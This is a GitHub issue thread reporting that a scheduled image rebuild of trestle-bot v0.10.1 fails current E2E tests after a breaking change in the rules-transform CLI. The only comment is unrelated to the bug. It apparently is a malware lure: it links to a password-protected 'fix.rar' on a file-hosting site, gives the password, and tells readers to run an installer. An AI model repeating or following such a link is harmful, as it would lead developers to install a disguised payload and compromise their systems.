### ISSUE TITLE
E2E Breaking Changes caused image rebuild failure on schedule trigger

### ISSUE THREAD

**Issue by jpower432** [RedHatProductSecurity/trestle-bot#332]
**Describe the bug**

The `trestle-bot` image from v0.10.1 is being rebuilt and tested against the current E2E test which are cauing a failure due to a breaking change in the `rules-transform` CLI

**To Reproduce**
1. Go to https://github.com/RedHatProductSecurity/trestle-bot/actions/runs/10189623597
2. Observe error

**Expected behavior**
Passing E2E tests

**Additional context**
N/A

**Comment by NeonRST** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
